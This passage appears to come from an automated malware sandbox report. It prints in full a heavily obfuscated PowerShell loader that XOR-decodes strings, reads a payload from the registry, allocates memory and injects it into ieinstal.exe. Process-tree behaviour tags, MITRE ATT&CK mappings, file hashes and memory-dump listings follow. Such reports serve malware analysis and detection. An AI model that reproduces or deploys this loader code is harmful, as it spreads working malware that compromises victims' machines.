UnvVeeRerStsEmoapeViiOusHekPreLi9Su Se`$AnKGuaBonEmdIniFydDiaJatSifBiegesBrtDieStrhe4Ul;Fa`$TrKUnaConPrdUdiIndPhaWitMofSheFoskatDeeEurek5Sa Ho=Ge InHHaTBiBEu Ha'Sl4LiEEc5ko9Fa4Or8Go4Pr9Ga4MaEWa5In2No1keCOr1Pr8Fi6RoAHy6Sv8Sk7DiEKi1Un2Ar7UnFXa4TaEVi5Un9Tr5BoDDa4Da8Pl5St9Sp6Su8in4Sp5Ic4UdCFu5Fd9Di1Ma4Zi1Br5Mi'Me;BaOOpvplescrFasEkoFoeNeiBosWikReeKi9He Be`$DeKReaDonAfdBaiafdZyaNotRyfGaefasSotViePerMa5Fi Ty Ek Re;Ta}By`$LikCakSk No=Cl PoHVaTVeBGr Gr'So5In7re5La9Di4MaEDo5lo2Ma5Im9Sc5Fl0Ro0VgFOu0udEBo'Sa;Bu`$BeKOpaLanNodOpiDidFoaFutStfPreOrsUdtSueKarVo6Ga Pr=Sa NoHFjTFaBAn Di'Un1Fe8Hu4GoAje5LaDGr4FoEBa6Va3Sa4ImASl5ndDVe1FoCse0Ba1Ud1KaCOi6Se7Hi6InFHa4In5Re4SyFSk4Du8Sh5Co9Ad5Co1Wa1Fl2tr6HjEFo4Be9Ta5Sk2Ty4Gr8Na5Gu5Sk5Ca1Ha5Re9De1Wh2Ph7Ma5Da5Pa2Li4Au8He5Br9Ho4JuECu5Fo3Fi4TrCme6EnFBo5Tr9By4DeEIn4SlASt5Sa5Ne5FoFTi5Da9Li4deFLi1Re2Fl7Lo1Ti5ArDMa4TaEAr4OmFWo5Mu4Bo5EjDSo5Ra0Cl6ou1Un0Va6Mo0Dr6En7MaBtj5Bu9Sl4Mi8Pa7Sk8Ta5Wa9Op5Se0Dy5Da9Bl5SuBSe5MaDFi4bu8Hu5Hj9Un7boABo5Br3Ca4EdEMi7NbAfa4Ou9Br5An2Pr5GyFIm4Sp8Va5So5Ha5Ma3Ja5Sp2Br6SeCek5Ju3To5Up5An5Ra2Ch4Du8Ph5vi9In4SyESt1Be4Pr1St4Fl5XeAMe5Wo7Av4enCem1SiCun1Ud8st5gr7Pa5Tu7Un1maCKo1af8Bi7Fr3se4StASa5Mi9St4VaETi4ErFSk5qu3Fl5Ni9Da5Su5as4CoFMo5In7Ef5To9Ne0Hy8Po1Sk5Ko1Fa0Sk1BrCSw1Za4pl7TrBFr7Ek8Wi6No8Ev1StCYa7PeCFe1La4hu6Th7Po7Be5St5la2In4St8Th6ToCAu4Af8Su4ImETh6Ov1Pe1At0Mu1HeCAd6Ru7Pl6Ar9Gr7Me5Re5Cl2Ja4Ti8Op0KyFRe0PrEHs6St1Co1Su0Kk1SjCHn6Hj7Ha6Su9Ov7Ad5Pr5Ca2So4Lo8Pr0CeFBa0PrEfa6Ud1St1Me0Ko1ShCUn6St7Re6Pa9Ki7Bo5Fo5Re2Ca4Cr8Pe0UnFLi0YnETu6Fr1Ha1Su5Ov1SpCSl1Ga4Si6De7Af7Sl5In5Fr2Un4In8Sk6BiCSc4vk8En4CoEHy6Ma1Yo1Sl5po1To5Pr1Sp5jo'Lt;LuOInvUdesuromsDeoOveNoiBasFokJueMa9He di`$DeKDhaitnHadAdiEpdstaAbtTefSyesosBitSyeAmrGa6Ca;Ch`$SavDeaDerIn_RenGytDr St=Vi nefBokUnpPr Pa`$IdOPhvMieRerFasLaoCoeRhiBasKokPoeNo5no Ka`$SiOInvJoeSerGusHyoTeeuniLusDekFieHe6Fo;An`$kaKMaaBrnStdSoiBadDdaDetRefTaeKosSktAuefrrUf7Xe Vl=Br uhHThTKrBUf Ab'Kn1Ro8Al4foFAf4St5At4KiFWe4Vi8Ma4Ba9Oo5ni9In4MoFJo0OxFEc1MoCSk0Ph1Ov1LaCSu1Wa8Sh4EvAUn5foDGr4weEAp6Co3hu4RhAMu5ExDRi1Te2Wi7Ny5Mi5Oe2Da4ReAFe5Rt3Ls5An7Pu5Ac9he1Ma4De6No7Ob7Lu5to5As2Bi4Em8Lr6SiCIn4Re8Pe4UrEMa6Se1Da0Ta6Fr0Kn6De6Re6Bo5st9Pa4SaESe5Be3Ov1Kl0La1HyCdi0LaFRe0Sa9Cl0BeEKe1Oa0He1LuCAf0EvCOr4Kr4Le0PrFHa0ImCSu0DmCKl0noCBu1Bo0In1DiCVl0AfCPo4Be4Ba0ce8In0VrCFr1Dr5Ve'As;StOslvPeeOsrInsLaoDieOuiCrsGakSeeCh9Bo Ji`$BiKHaaWandodSkiTudstaVatUnfFreHesfrtCoeSlrac7No;Ol`$CrKSoaDunBldCaiBedTaaNotSofMoePrsCotCoePhrPi8Ek Si=Sy boHLuTHaBEt Ka'In1Be8Te5Co3Gr4AtEXw5Fo5Tn1AdCKl0St1Te1NoCGo1Dr8Fl4UnAKl5maDkk4BaEEl6Un3tr4FiAsu5PoDRe1Ha2Ne7Kn5Un5pa2Re4KrACa5Fa3Ok5Ti7De5Oe9Pe1Ey4Jo6Ll7Ci7Ha5Tr5Am2Ko4My8In6tiCTi4An8Ca4BrEBl6Sn1Ge0By6un0Ga6Ar6Mi6Su5Ba9In4BiEIn5Ha3To1St0Re1SeCPa0ChCFo4Sk4Ud0UsDNo0miCTo0ArCKo0FoCGa0UnCIn0SeCBe1Ri0Nu1DeCAf0BlCEk4Se4fo0AlFDr0FeCAs0FlCDr0SiCDy1Ma0Cu1UdCAn0urCPr4To4Ve0Tr8Be1Be5Sl'Gu;afOJuvJueSkrObsAnomiemaiResOukFreMi9Sk Fi`$OvKvaaovnRedBriTedInaSetStfAneKasPltEmeRerno8Eb;Ty`$CoVTaeOdrDadDasTolNoiLagHneRrsPo=Oc(InGBeehotRe-lmIAptspeEfmTvPKarEfoMipCoeKrrSutHyygr Go-UnPUlaNotguhDe Ra'ThHPoKDiCKoUKo:ov\ApbKirHuaAcnFutBolfoeSp\PsASyrRbbFleFojHjdFosAfvGerveeJalGasAaeEltSusDo'Wi)Bo.CuCMaoParDavNueDdesvsNo;Me`$BiKEnaRonVidSaiSkdCoaDitPofGaeTrsWitPaehyrEi9Op Hu=Ve UdHViTDiBSt La'Sl1Mi8Sk7Tr7qu5UnDSe5Ko2un5Te8an5Sp5Re5Du8Af5SuDEu4sp8Mi5DiAMe5Tr9un4TaFSk4Gu8Tu5Ko9Kl4SkESt1StCOp0Si1An1UtCCr6me7Mo6KoFUd4Ca5In4FrFSt4Si8Af5Tm9Si5Pa1Ko1Cr2Pe7BoFUn5In3Al5Vr2Br4AsASn5Bo9Bi4GrERa4Fi8ko6Sn1Re0Ov6Aa0Fl6fa7ChARa4PeEBj5Me3Ud5Te1Bl7prEMi5ApDdo4BmFGl5Ou9Un0SjAPr0St8So6RlFqu4Fi8Ch4PaELu5To5Li5Fy2Fl5AlBAf1Br4Sk1Ap8Ka6DaARe5Bi9Ei4HiECi5Fa8Fr4anFDi5Mo0Un5Fo5we5NoBAr5Fi9Un4UdFLs1Fo5Co'Fo;guOUnvPueDarFrsFboBiecriTrsRakEuePe9Pl Ha`$LaKAfaUnnabdByiSldChaFltMifFieLasTutTueMurUd9Su;Ga`$unVIneSprOfdDrsBelSiiSjgEneBlsAc0Un Au=Ca FoHHoTSqBTa to'Pe6Fl7Ak6voFAp4an5Mi4ErFDr4Ar8fl5Al9En5Ps1Rv1Sk2me6JuERu4Pi9Sv5Co2Fi4di8Ep5Re5Bi5Lr1Un5Or9Op1Ho2St7Ki5Bi5De2Pr4sy8Co5Fo9Qu4FiEKb5Su3Sk4ReCHo6KaFSa5Re9Sa4BaEfe4DaASt5Ma5Re5KoFBl5Sk9Pu4LiFId1Lu2Tr7Gr1ko5HjDCa4UnEWe4PsFLe5Un4Ac5HaDLo5Tu0Un6Ha1Sp0Ph6Ch0Va6Ko7GoFDi5Dy3St4agCGe4Tr5Vi1di4Mo1Sl8Vi7Ed7Un5DiDSt5Co2Fo5Un8Ch5Su5Ga5Va8Co5AdDSe4Am8sa5hjAOm5Ca9Sj4afFSt4Di8Ar5Aa9Ua4SkEIm1Ha0Ho1AkCne0SeCSp1In0ma1TeCEb1imCbl1He8Hi4KrFre4Sk5Sk4GaFMe4Id8Pe4Al9Sp5re9Xe4PeFOu0EuFPh1El0Re1AnCTi0LaFQu0Un9Fo0thEco1Br5Ra'Ch;plORevReeUnransItoSieAnibesExkUneBa9Ko Cy`$HjVIteForStdVesSolBaiOpgBeeQusUp0Fo;ol`$HasFaisazPeeAi=af`$NoKReaTrnKldRuiOldSaaChtSefMaePssTjtsmeChrOv.FrcpaoReuKrnHetAm-Mv3Gr5Be2Ex;An`$stVAleTcrnadtosphlseiDigYeeLosPo1Ha De=In HjHDrTKoBRy Op'Fl6Ec7Fa6BeFch4Li5St4DiFbs4Ef8un5be9el5Bi1Pr1Ba2Hu6FoEBl4Ur9Re5Ar2Ch4Vi8si5Ar5Cu5Ei1Ox5Mo9Ch1He2Ma7Sa5Av5El2An4An8Ta5br9Kr4SpEAn5Ta3He4OpCTe6IsFKa5Br9No4EnEMn4SpAUr5Bi5Ju5EpFAc5Ko9Be4SuFCo1Dr2Sy7In1Me5CoDTe4RyEGe4GeFMe5Ge4By5MoDHu5le0Mu6Th1Cl0Po6Ba0Ih6Le7BrFNo5Be3En4ViCPl4Bo5En1Sy4Di1Ge8Cr7Vs7Su5BiDDi5Ca2Un5Gl8Va5Gu5Ma5Ph8No5GiDTo4Ma8An5UnAPh5Va9Me4UkFIn4Ra8Ta5Aa9Ad4inEAi1Ka0Zo1ElCFo0FaFAs0Sp9Au0MiESo1Te0Uf1UnCMe1Pe8Re5Po3My4IaEFa5ad5ho1Ar0Lu1kaCEx1Re8In4UnFDa5To5Sk4De6Tr5Ka9De1Re5Sa'Fo;SkOCavcueTrrDusReoAbehoiPosUnkLoeOc9Sl Ox`$MeVBaeBlrRadMasKrlItiPigNoeKosAf1To;Su`$TrVFaeSorSydEnsBalIniItgKaeDesFr2Bi Sk=Pl BeHMbTDeBLj Kk'Le1fi8Sk4BeAEp5HeDEp4UnEUn6Su3Ud4PiEEo4Ph9Fe5My2Cu5Da1op5Se9Ga1ExCAt0Fo1Bl1UnCKo6De7Ty6prFUn4To5Ch4FoFOv4Re8Re5Ta9In5Le1Pr1Ra2Po6FaEEg4Ya9St5Pa2Di4In8Qu5Ro5Mu5Ud1Se5Po9Li1De2Be7St5Di5In2Sk4Bl8Fd5Ra9Ej4ChEBr5Fo3My4AdCBl6LiFOr5Bu9An4ReETi4EnAPe5un5Sp5LaFBa5Da9Ve4ReFUt1Ma2Ca7Hi1Br5BrDde4MeEPo4KoFWa5No4Wa5SiDWe5Se0De6Fo1He0Sk6Pr0Pe6Pr7ImBAw5De9Ta4Un8Ci7Te8Gu5Kr9La5Ar0Sa5By9In5PaBEf5CiDde4Sk8Re5Au9Un7HeASe5ma3Py4BuECe7BeAVi4Fl9An5St2Br5KlFFj4Sl8Ma5Eu5Su5ma3Mu5ro2Be6GuCBa5ru3Sp5To5Hj5Op2El4De8ko5Ap9Op4StEHj1Sc4Ne1Mi8Af4CrFTr4pe5De4ClFSp4Be8Wa4Ms9Pe5Ni9Ha4BeFwe0ArFIn1Gl0Kn1GnCJa1Be4Sp7GeBHy7Dd8Sc6sk8De1BoCAp7FaCAu1ar4Re6Pn7Be7Ge5Pa5Da2Da4ud8Be6SnCSi4Ud8Je4HiENv6Ku1ma1Ph0Su6Pr7Be7Au5Re5Mi2Bu4Mo8Ag6GaCCa4Br8Un4JoESa6sp1Th1Te5An1GlCMo1Au4No6Ch7De6MuAfo5Sa3br5Sp5St5Sk8Do6Ka1No1vo5Fo1Ax5Pe1Ac5Ki'Ba;CaOGavSeelgrTosCuoKaeKeiOvsalkDieSa9Bi op`$UnVVaePerTadPossklEkiStgroetosKl2Sy;Ph`$SoVRaeBirEmdTrsUxlPeiBrgUleSusSk3tr Pi=De SyHFjTDeBSu Ku'Pa1Gu8Ar4UnAsp5UiDVe4PaEBl6Kr3Us4MaEsv4Tr9Ge5Vo2Di5Gu1Ne5Ka9Po1Kr2Om7Ve5Wo5He2Re4SaALe5Ri3An5He7Ma5Te9Ta1Ud4Ze1Al8Mo5Mo3He4GuERe5Ti5Ou1Es0Fo1Re8Tr4HaATu5KoDTr4soELe6st3Uf5st2Ca4Sc8De1Pe5Su'Fo;stONuvReeHerScsPuolteIsiHesZokYpeSk9Kn Pr`$FyVPoeParIndSnsMelGriHugRieMisCo3Kr#Pr;""";;Function Verdsliges9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Filbehandlingerne = $Filbehandlingerne + $HS.Substring($i, 1); } $Filbehandlingerne;}$Knsrollemnsters0 = Verdsliges9 'SaITeEAfXLa ';$Knsrollemnsters2 = Verdsliges9 'UdsUdtSoaCerpatar-VajBooLibSk ';$Knsrollemnsters1= Verdsliges9 $Hampegarn;;if([IntPtr]::size -eq 8){ & ($Knsrollemnsters2) { param($a) powershell $a } -RunAs32 -Argument $Knsrollemnsters1 | wait-job | Receive-Job;}else{ & ($Knsrollemnsters0) $Knsrollemnsters1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4716

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 60); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Acclimations0=HTB '6F454F48595112585050';$Acclimations1=HTB '71555F4E534F535A48126B55520F0E1269524F5D5A59725D48554A597159485453584F';$Acclimations2=HTB '7B59486C4E535F7D58584E594F4F';$Acclimations3=HTB '6F454F485951126E49524855515912755248594E534C6F594E4A555F594F12745D525850596E595A';$Acclimations4=HTB '4F484E55525B';$Acclimations5=HTB '7B5948715358495059745D52585059';$Acclimations6=HTB '6E686F4C595F555D50725D5159101C745558597E456F555B101C6C495E50555F';$Acclimations7=HTB '6E495248555159101C715D525D5B5958';$Acclimations8=HTB '6E595A50595F485958785950595B5D4859';$Acclimations9=HTB '7552715951534E45715358495059';$Oversoeiske0=HTB '7145785950595B5D485968454C59';$Oversoeiske1=HTB '7F505D4F4F101C6C495E50555F101C6F595D505958101C7D524F557F505D4F4F101C7D4948537F505D4F4F';$Oversoeiske2=HTB '75524A535759';$Oversoeiske3=HTB '6C495E50555F101C745558597E456F555B101C72594B6F505348101C6A554E48495D50';$Oversoeiske4=HTB '6A554E48495D507D5050535F';$Oversoeiske5=HTB '5248585050';$Oversoeiske6=HTB '72486C4E5348595F486A554E48495D50715951534E45';$Oversoeiske7=HTB '757964';$Oversoeiske8=HTB '60';Set-Alias -name Oversoeiske9 -value $Oversoeiske7;function fkp {Param ($v_m, $v_p) ;$Kandidatfester0 =HTB '184A4952511C011C14677D4C4C7853515D55526106067F494E4E5952487853515D5552127B59487D4F4F59515E5055594F14151C401C6B54594E5911735E56595F481C471C1863127B50535E5D507D4F4F59515E50457F5D5F54591C117D52581C18631270535F5D48555352126F4C5055481418734A594E4F5359554F5759041567110D6112794D495D504F14187D5F5F5055515D485553524F0C151C4115127B594868454C5914187D5F5F5055515D485553524F0D15';Oversoeiske9 $Kandidatfester0;$Kandidatfester5 = HTB '184A5D4E635B4C5D1C011C184A495251127B594871594854535814187D5F5F5055515D485553524F0E101C6768454C596761611C7C14187D5F5F5055515D485553524F0F101C187D5F5F5055515D485553524F081515';Oversoeiske9 $Kandidatfester5;$Kandidatfester1 = HTB '4E5948494E521C184A5D4E635B4C5D1275524A535759141852495050101C7C14676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12745D525850596E595A611472594B11735E56595F481C6F454F485951126E49524855515912755248594E534C6F594E4A555F594F12745D525850596E595A141472594B11735E56595F481C7552486C484E15101C14184A495251127B594871594854535814187D5F5F5055515D485553524F0915151275524A535759141852495050101C7C14184A635115151515101C184A634C1515';Oversoeiske9 $Kandidatfester1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Kandidatfester2 = HTB '186A687E1C011C677D4C4C7853515D55526106067F494E4E5952487853515D55521278595A5552597845525D51555F7D4F4F59515E5045141472594B11735E56595F481C6F454F485951126E595A50595F48555352127D4F4F59515E5045725D515914187D5F5F5055515D485553524F041515101C676F454F485951126E595A50595F485553521279515548127D4F4F59515E50457E49555058594E7D5F5F594F4F6106066E4952151278595A5552597845525D51555F71535849505914187D5F5F5055515D485553524F05101C185A5D504F59151278595A55525968454C591418734A594E4F5359554F57590C101C18734A594E4F5359554F57590D101C676F454F4859511271495048555F5D4F48785950595B5D48596115';Oversoeiske9 $Kandidatfester2;$Kandidatfester3 = HTB '186A687E1278595A5552597F53524F484E495F48534E14187D5F5F5055515D485553524F0A101C676F454F485951126E595A50595F48555352127F5D505055525B7F53524A5952485553524F6106066F485D52585D4E58101C184A5D4E634C5D4E5D515948594E4F15126F594875514C5059515952485D485553527A505D5B4F14187D5F5F5055515D485553524F0B15';Oversoeiske9 $Kandidatfester3;$Kandidatfester4 = HTB '186A687E1278595A5552597159485453581418734A594E4F5359554F57590E101C18734A594E4F5359554F57590F101C184A4E48101C184A5D4E634C5D4E5D515948594E4F15126F594875514C5059515952485D485553527A505D5B4F14187D5F5F5055515D485553524F0B15';Oversoeiske9 $Kandidatfester4;$Kandidatfester5 = HTB '4E5948494E521C186A687E127F4E595D485968454C591415';Oversoeiske9 $Kandidatfester5 ;}$kk = HTB '57594E5259500F0E';$Kandidatfester6 = HTB '184A5D4E634A5D1C011C676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067B5948785950595B5D48597A534E7A49525F485553526C53555248594E14145A574C1C1857571C18734A594E4F5359554F57590815101C147B78681C7C14677552486C484E61101C67697552480F0E61101C67697552480F0E61101C67697552480F0E61151C14677552486C484E61151515';Oversoeiske9 $Kandidatfester6;$var_nt = fkp $Oversoeiske5 $Oversoeiske6;$Kandidatfester7 = HTB '184F454F4849594F0F1C011C184A5D4E634A5D1275524A53575914677552486C484E61060666594E53101C0F090E101C0C440F0C0C0C101C0C44080C15';Oversoeiske9 $Kandidatfester7;$Kandidatfester8 = HTB '18534E551C011C184A5D4E634A5D1275524A53575914677552486C484E61060666594E53101C0C440D0C0C0C0C0C101C0C440F0C0C0C101C0C440815';Oversoeiske9 $Kandidatfester8;$Verdsliges=(Get-ItemProperty -Path 'HKCU:\brantle\Arbejdsvrelsets').Corvees;$Kandidatfester9 = HTB '18775D525855585D485A594F48594E1C011C676F454F485951127F53524A594E486106067A4E53517E5D4F590A086F484E55525B14186A594E584F50555B594F15';Oversoeiske9 $Kandidatfester9;$Verdsliges0 = HTB '676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067F534C451418775D525855585D485A594F48594E101C0C101C1C184F454F4849594F0F101C0F090E15';Oversoeiske9 $Verdsliges0;$size=$Kandidatfester.count-352;$Verdsliges1 = HTB '676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067F534C451418775D525855585D485A594F48594E101C0F090E101C18534E55101C184F55465915';Oversoeiske9 $Verdsliges1;$Verdsliges2 = HTB '184A5D4E634E495251591C011C676F454F485951126E49524855515912755248594E534C6F594E4A555F594F12715D4E4F545D506106067B5948785950595B5D48597A534E7A49525F485553526C53555248594E14184F454F4849594F0F101C147B78681C7C14677552486C484E6110677552486C484E61151C14676A53555861151515';Oversoeiske9 $Verdsliges2;$Verdsliges3 = HTB '184A5D4E634E495251591275524A5357591418534E5510184A5D4E63524815';Oversoeiske9 $Verdsliges3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
5⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1172

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
548e21a8f5e2c98bf35e935495e36c05

SHA1
39fa41b02e71c3e931c1840ab86606f9529d8398

SHA256
5c626706da5e310c0b96a1fbc0cee8756a9099124e8dab6b9c91ac5090c4cd0d

SHA512
f74e92b83a16a69ce251e2d88cf975eba0db28bc2b88ababeb5d4307f352f1291c02f3e412445c20b45dee801bf8497e2ed1c22a495ab296ca83638dc2c5c479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
2bcfce2b951487e14859649268b145cb

SHA1
7a219881fd0c1c28e08c4d1905f32845b49073a9

SHA256
2b0ffee4b25877a4e08f989ae9a6f6fea590345549cc73ed9a8f82608b285e6b

SHA512
87052dfc32a178fb0b3c29b57d9c58a5f04a9edf6e41ec991dc25d7e94c170763a4f8cf4c08efb83bec6f86e8ebd1ddc1e7c718cc462a1e54af663a3f0195f64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
2bcfce2b951487e14859649268b145cb

SHA1
7a219881fd0c1c28e08c4d1905f32845b49073a9

SHA256
2b0ffee4b25877a4e08f989ae9a6f6fea590345549cc73ed9a8f82608b285e6b

SHA512
87052dfc32a178fb0b3c29b57d9c58a5f04a9edf6e41ec991dc25d7e94c170763a4f8cf4c08efb83bec6f86e8ebd1ddc1e7c718cc462a1e54af663a3f0195f64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
a1106447f8fd488820bb459a7c77654f

SHA1
ebd1139ec8175e7b6f8f00df8ac27fea4c0f3d44

SHA256
8895e9f4da9017586761e3b066e386ff3e7acce9e75c9c71f90fcd097c42e58a

SHA512
f7ed2bf8cc8e3c7b3d9ea12d0220d6ca9f9958610b934de878cb2da7470b81b8dde818a2b6e811701af00e411115cb84e82bfbe6095b376001fbb353eb180c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
8d972fba81431f985a5b5c7d9764e193

SHA1
495ea6ea3f3f18df86aefc431226cd74b566ac54

SHA256
29ba4ebdc30fd70d9dc6abfb20a576d696989fe5dee0be04c64df746ea119f50

SHA512
ad8d881d5aae0b194c8a19602afdbc3eb8e9064f1274456558827d1ae3eff447fc75a8350c59c70157b0ec631f0e8dc3678eeae3e9e2aa14e9477f037219d864

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
b37f26cf29e38a852a0e80874c42214d

SHA1
32f9eeb3ba4b9c8be7ce57b428abdbae2657dffc

SHA256
fc35477b19158e0c4b43131a8d7cd54762f4d9b8d294310b2233f90b4839316c

SHA512
c2de9c21ad4e94aab4579620a0ec9b7b6fd996e63efd3c970d135193057532c5b4f3e2b50893c272985901c7c4327b131468e6b582b52fc3ce8d04c85babbcec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
b37f26cf29e38a852a0e80874c42214d

SHA1
32f9eeb3ba4b9c8be7ce57b428abdbae2657dffc

SHA256
fc35477b19158e0c4b43131a8d7cd54762f4d9b8d294310b2233f90b4839316c

SHA512
c2de9c21ad4e94aab4579620a0ec9b7b6fd996e63efd3c970d135193057532c5b4f3e2b50893c272985901c7c4327b131468e6b582b52fc3ce8d04c85babbcec

Download Submit
memory/1172-180-0x00007FFE26C50000-0x00007FFE26E45000-memory.dmp

Filesize
2.0MB

Download
memory/1172-179-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1172-175-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/1172-172-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/1172-159-0x0000000000000000-mapping.dmp

Download
memory/1172-170-0x0000000077630000-0x00000000777D3000-memory.dmp

Filesize
1.6MB

Download
memory/1172-169-0x00007FFE26C50000-0x00007FFE26E45000-memory.dmp

Filesize
2.0MB

Download
memory/1172-181-0x0000000077630000-0x00000000777D3000-memory.dmp

Filesize
1.6MB

Download
memory/1172-167-0x0000000000A00000-0x0000000000B00000-memory.dmp

Filesize
1024KB

Download
memory/1172-162-0x0000000000A00000-0x0000000000B00000-memory.dmp

Filesize
1024KB

Download
memory/1172-160-0x0000000000A00000-0x0000000000B00000-memory.dmp

Filesize
1024KB

Download
memory/1420-148-0x0000000007650000-0x0000000007672000-memory.dmp

Filesize
136KB

Download
memory/1420-164-0x0000000077630000-0x00000000777D3000-memory.dmp

Filesize
1.6MB

Download
memory/1420-182-0x0000000077630000-0x00000000777D3000-memory.dmp

Filesize
1.6MB

Download
memory/1420-144-0x0000000000000000-mapping.dmp

Download
memory/1420-147-0x00000000076C0000-0x0000000007756000-memory.dmp

Filesize
600KB

Download
memory/1420-166-0x0000000077630000-0x00000000777D3000-memory.dmp

Filesize
1.6MB

Download
memory/1420-157-0x00007FFE26C50000-0x00007FFE26E45000-memory.dmp

Filesize
2.0MB

Download
memory/1420-158-0x0000000077630000-0x00000000777D3000-memory.dmp

Filesize
1.6MB

Download
memory/1420-152-0x0000000007510000-0x0000000007610000-memory.dmp

Filesize
1024KB

Download
memory/1420-150-0x0000000007510000-0x0000000007610000-memory.dmp

Filesize
1024KB

Download
memory/1420-161-0x0000000077630000-0x00000000777D3000-memory.dmp

Filesize
1.6MB

Download
memory/1420-149-0x00000000088D0000-0x0000000008E74000-memory.dmp

Filesize
5.6MB

Download
memory/4684-140-0x0000000005370000-0x0000000005392000-memory.dmp

Filesize
136KB

Download
memory/4684-142-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/4684-137-0x0000000000000000-mapping.dmp

Download
memory/4684-139-0x0000000004D00000-0x0000000005328000-memory.dmp

Filesize
6.2MB

Download
memory/4684-141-0x0000000005410000-0x0000000005476000-memory.dmp

Filesize
408KB

Download
memory/4684-145-0x0000000006AF0000-0x000000000716A000-memory.dmp

Filesize
6.5MB

Download
memory/4684-143-0x0000000005D20000-0x0000000005D3E000-memory.dmp

Filesize
120KB

Download
memory/4684-146-0x0000000006260000-0x000000000627A000-memory.dmp

Filesize
104KB

Download
memory/4684-138-0x0000000004690000-0x00000000046C6000-memory.dmp

Filesize
216KB

Download
memory/4716-151-0x00007FFE08D80000-0x00007FFE09841000-memory.dmp

Filesize
10.8MB

Download
memory/4716-135-0x00007FFE08D80000-0x00007FFE09841000-memory.dmp

Filesize
10.8MB

Download
memory/4716-136-0x000001B9583F0000-0x000001B9585FA000-memory.dmp

Filesize
2.0MB

Download
memory/4716-133-0x000001B956E00000-0x000001B956E22000-memory.dmp

Filesize
136KB

Download
memory/4716-134-0x000001B958060000-0x000001B9581D6000-memory.dmp

Filesize
1.5MB

Download
memory/4716-132-0x0000000000000000-mapping.dmp

Download
memory/4716-183-0x00007FFE08D80000-0x00007FFE09841000-memory.dmp

Filesize
10.8MB

Download